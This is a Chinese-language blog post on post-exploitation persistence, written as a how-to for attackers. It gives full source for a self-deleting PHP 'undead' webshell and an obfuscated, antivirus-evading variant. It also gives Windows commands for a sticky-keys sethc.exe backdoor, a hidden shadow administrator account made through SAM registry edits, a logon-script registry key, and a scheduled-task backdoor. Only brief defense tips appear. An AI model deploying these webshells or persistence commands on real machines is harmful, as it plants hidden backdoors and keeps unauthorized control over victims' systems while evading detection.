首页 > 其他分享 >后渗透之权限维持

后渗透之权限维持

时间:2023-06-11 12:23:29浏览次数:28  
标签:exe 渗透 db 注册表 test net 权限 php 维持

内存马(不死马)

最常见的内存马

<?php
  set_time_limit(0);		#用来设置脚本最大的执行时间,如果为0的话,就会一直执行这个脚本,设置其他数字的话,则按照设置的秒数来进行执行,注意,执行时间和php.ini里的max_execution_time设置有很大的关系,真实时间的计算公式是max_execution_time+time
  ignore_user_abort(1);		#当链接断开,继续执行
  unlink(__FILE__);			#删除当前文件
  while (1) {
  	$content = '<?php @eval($_POST["zzz"]) ?>';
  	file_put_contents("config.php", $content);		#创建文件,写入内容
  	usleep(10000);		#延迟执行
  }
?>

免杀内存马

采用了拼接,旋转,加密解密的手法进行隐藏,并且自定义函数,配合变量替换,成功对绕过进行免杀
因为创建了类,所以这个内存马,暂时只支持5.3以上的高级php版本
运行后将持续创建log.php

可更改yourcode自定义写入log.php文件内容

<?php
static $time =10000 ;     
static $yourcode = 'Cjw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/Pg==';      //bypass
header("Content-Type: text/html; charset=utf-8");
function EasyTo($myfile,$author){
    fwrite($myfile,$author);
    return Fread($myfile,"111"); 
}
class FileRead{
    function __construct($read,$num){
        $a = 1;
        if ($num != Null)
             $a = strlen($num);
        print Fread($read,$a);
    }
    function test(){
        echo "<br>"."ok\n";
    }
	function eb($yijufa){  
        $b = "_46esab";
		$e = "edocne";
		$eb = srv($e.$b);
        return $eb($yijufa);	
    }
    function db($jiekai){  
        $c = "_46esab";
		$a = "edoced";
		$db = srv($a.$c);
        return $db($jiekai);
    }
    function zhixing($hiddden){  
        $ss = "ss";
        $tt = "tt";
        $yy = "yy";
        $ee = "em";
        $db = srv($ss[1].$yy[1].$ss[0]).srv($ee[1].$ee[0].$tt[0]);
        return $db($hiddden);
    }
}
function srv($str){    
    $new_str = "";
	for ($i = strlen($str)-1;$i >= 0; $i--){
        $new_str .= $str{$i};
    }
    return $new_str;
}
ignore_user_abort(true);
set_time_limit($time);  
while(1)
{
	$clear = fopen("log.php", "r"); 
	fgets($clear);
	echo $tmp = "\n".fgets($clear);  

    $myfile = fopen("log.php ", "a+"); 
    $a = $myfile;
	$b = new FileRead($a,"asdasdasdasdasdasd");
    $t = date('Y-M-D H:i:s',time()); 
	$tt = $b->eb($t);  
	unlink(__FILE__);
	$code = $yourcode; 
	if(md5($tmp)===md5($b->db($code)))     
	{
		echo md5($tmp)."\n";
		echo md5($b->db($code));	
	}
    else
	    EasyTo($a,$b->db($tt.$code));  
    echo $b->zhixing(srv("birtta")." +s +h log.php");
	fclose($clear);
	fclose($myfile);
    usleep(5000000);
}
?>

防御方式

1,创建同名文件夹

rm config.php & mkdir config.php

2,条件竞争

3,kill杀进程

kill -9 -1  #杀掉当前用户下的所有进程

shift后门

创建shift粘贴键后门

粘滞键的启动程序在C盘的Windows/system32目录下为sethc.exe。所以我们打开注册表,定位到以下路径:
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption

在目录中新建一个sethc.exe的子项,并添加一个新键debugger,debugger的对应键值为后门木马的路径,这里我用cmd路径代替一下。
cmd路径:C:\Windows\system32\cmd.exe

shift粘贴键后门创建完成之后,在锁屏状态下连按次shift粘贴键,C:\Windows\system32\cmd.exe文件运行,弹出命令行。

通过命令行的话需要知道sethc文件位置

粘滞键位置:c:\windows\system32\sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe

影子账号

1.使用如下命令创建隐藏用户并加入管理员组

net user test$ 123456 /add
net localgroup administrators test$ /add

创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏。
打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM)
修改SAM权限,赋予adminitrators完全控制权限。

将Administrator用户对应项的F数据值复制到test$用户对应项的F数据值。

将test$和所对应项000003F1导出,分别命名为test.reg和1.reg

删除test$用户,将test.reg和1.reg导入注册表

net user test$ /delregedit /s test.regregedit /s 1.reg

此时在用户组已经看不到test$用户,只能在注册表中能看到。

删除方式

net user test$ /del

虽然net user不能显示影子账号,但是wmic useraccount get Name会显示

wmic useraccount get Name

也可以通过计算机管理 -> 本地用户和组 中直接删除

logon scripts后门

Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。
注册表位置:HKEY_CURRENT_USER\Environment
常用来上线cs

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\666.exe" 
#创建键为:UserInitMprLogonScript,其键值为我们要启动的程序路径

计划任务后门

schtasks命令设定计划自动启动后门程序。

schtasks /Create /tn Updater /tr c:\666.exe /sc minute /mo 5 #每5分钟自动执行666.exe

黄金票据

白银票据

DLL劫持

标签:exe,渗透,db,注册表,test,net,权限,php,维持
From: https://www.cnblogs.com/Y0uhe/p/17472775.html

相关文章

  • 系统权限ABAC和RBAC
    ABAC的思想是基于用户、以及将要访问的数据的属性、以及各种环境因素去动态计算用户是否有权限进行操作。转载:https://juejin.cn/post/6941734947551969288#commenthttps://blog.csdn.net/hhhhhhhhhhhhhhhc/article/details/125906529......
  • 记录一次新手渗透的过程
    这是严格意义上的第一次动手实操,相对于无限的理论学习与记忆,我个人是觉得让我动手操作一次让我的收获更大。目标靶机:http://testphp.vulnweb.com/工具使用:KaliLinux参考文档:   【渗透测试】渗透测试最强秘籍(Part1:信息收集)–绿盟科技技术博客(nsfocus.net)明确目标之......
  • Kali 渗透测试工具 Metasploit 的使用
    Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 文件结构与模块:路径:/usr/share/metasploit-framework/config:MSF环境配置信息,数据库配置信息data:后渗透模块的一些工具及pa......
  • vuex使用,Router使用(做两个主页面的跳转),路由守卫(对路由进行权限控制),路由的工作模式
    vuex使用使用的流程文件中的代码前端页面<template><div><h1>使用vuex</h1>购物车商品数量:{{num}}购物车的数量:{{$store.state.num}}<br><button@click="yjx">加数量</button></div></template><sc......
  • 账号和权限管理
    账号和权限管理推荐步骤:➢用户账户管理创建➢创建➢目录文件属性配置修改单个目录权限,循环将多个目录权限设置为指定的用户和组实验步骤:用户账户管理创建创建查看新创建的用户创建查看创建用户给查看锁定解锁用户清空密码将查看修改后的名字修改查看修改的用户信息创建创建组名......
  • Web安全-渗透测试-基础知识06
    加密编码算法在渗透测试中,常见的密码等敏感信息会采用加密处理,其中作为安全测试人员必须要了解常见的加密方式,才能为后续的安全测试做好准备加密算法的种类加密算法分为可逆、不可逆加密算法,而不可逆加密算法又分为对称加密和非对称加密不可逆加密:不可逆加密算法最大的特......
  • Kali Linux - 网站渗透测试
    CMS扫描工具:wpscan 是一个黑盒子WordPress漏洞扫描程序,可用于扫描远程WordPress安装以查找安全问题。我在网络上找到的使用方法如下:wpscan-u网页网址但这个指令根本无法使用,使用以下指令查看后:wpscan-h发现得用以下指令才对:wpscan--url域名地址之后给的提示如......
  • mybatis拦截器实现数据权限
    前端的菜单和按钮权限都可以通过配置来实现,但很多时候,后台查询数据库数据的权限需要通过手动添加SQL来实现。比如员工打卡记录表,有id,name,dpt_id,company_id等字段,后两个表示部门ID和分公司ID。查看员工打卡记录SQL为:selectid,name,dpt_id,company_idfromt_record当一个总......
  • 拦截器应用举例之权限拦截器
    1. 项目需求  68只有经过登录的用户方可访问处理器,否则,将返回“无权访问”提示。本例的登录,由一个 JSP 页面完成。即在该页面里将用户信息放入 session 中。也就是说,只要访问过该页面,就说明登录了。没访问过,则为未登录用户。2. 项目实现  68使用拦截器检查登录的用户是不......
  • Uniapp获取手机存储权限
    //判断有没有存储权限qxcz(){var_this=thisplus.android.requestPermissions(['android.permission.WRITE_EXTERNAL_STORAGE'],function(e){if(e.deniedAlways.length>0){//权限被永久拒绝......